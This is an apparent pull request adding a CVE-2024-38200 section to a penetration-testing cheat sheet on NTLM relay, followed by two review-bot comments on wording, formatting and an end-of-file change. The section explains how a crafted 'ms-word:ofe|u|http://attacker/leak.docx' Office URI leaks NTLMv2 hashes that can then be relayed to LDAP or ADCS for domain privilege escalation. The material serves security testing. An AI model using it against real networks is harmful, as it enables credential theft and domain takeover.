Update internal-mitm-relay.md #21

Open. Wants to merge 1 commit into base: main
8 changes: 7 additions & 1 deletion docs/active-directory/internal-mitm-relay.md
Expand Up @@ -344,6 +344,12 @@ pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and c

* S3th: https://github.com/SySS-Research/Seth, performs ARP spoofing prior to launching the RDP listener

## CVE-2024-38200
CVE-2024-38200 enables the capture of victim users' NTLMv2 hashes over SMB and HTTP by leveraging the Office URI Schema.<br>
If we add a DNS A record and use this record name within the Office URI Schema (e.g., ms-word:ofe|u|http://attacker/leak.docx), Windows will consider the hostname as part of the Intranet Zone by default. In this way, NTLMv2 authentication occurs automatically when an Office application fetches a document from a remote source via crafted `ms-word:ofe|u|http://attacker/leak.docx` Office URI. The only requirement is for the victim user to visit the URL of an HTML file that redirects to the `ms-word:ofe|u|http://attacker/leak.docx`. A standard user can escalate privileges with LDAP relaying when this attack is performed against privileged user (e.g., enterprise admin, domain admin). <br>
Capturing the NTLMv2 hash over HTTP method was not fixed (a warning box still does not apper). The NTLMv2 hash value can still be obtained over HTTP and relayed to LDAP or ADCS.

https://github.com/passtheticket/CVE-2024-38200

## References

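Review bot: the added CVE-2024-38200 section has two wording defects in its closing sentences: `apper` should be `appear`, and `performed against privileged user` should read `performed against a privileged user`. It also departs from the file's own conventions: the surrounding text separates paragraphs with blank lines rather than trailing `<br>` tags, and the bare URL `https://github.com/passtheticket/CVE-2024-38200` should follow the `* [Title - Author - Date](url)` style used in the References list directly below, ideally as an entry there. Finally, "Capturing the NTLMv2 hash over HTTP method was not fixed (a warning box still does not appear)" is a point-in-time statement about the vendor patch; name the update or the date it was verified against so readers can re-check it, since a later fix would make the sentence wrong without anyone noticing.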
Expand All @@ -353,4 +359,4 @@ pyrdp-mitm.py <IP> -k private_key.pem -c certificate.pem # with custom key and c
* [NTLM Relaying to LDAP - The Hail Mary of Network Compromise - @logangoins - July 23, 2024](https://logan-goins.com/2024-07-23-ldap-relay/)
* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials)
* [Relay Your Heart Away: An OPSEC-Conscious Approach to 445 Takeover - Nick Powers - 07/27/2024](https://www.youtube.com/watch?v=iBqOOkQGJEA)
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher - Mar 9, 2018](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher - Mar 9, 2018](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
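Review bot: the removed and re-added "Top Five Ways I Got Domain Admin..." line is character-for-character identical in the rendered diff, so this hunk most likely changes only the trailing newline at end of file or the line ending. That is harmless if it adds the missing final newline, but it is unrelated to the CVE-2024-38200 addition the PR is about; if it turns out to be a CRLF/LF conversion, revert it so the diff stays focused on the new section.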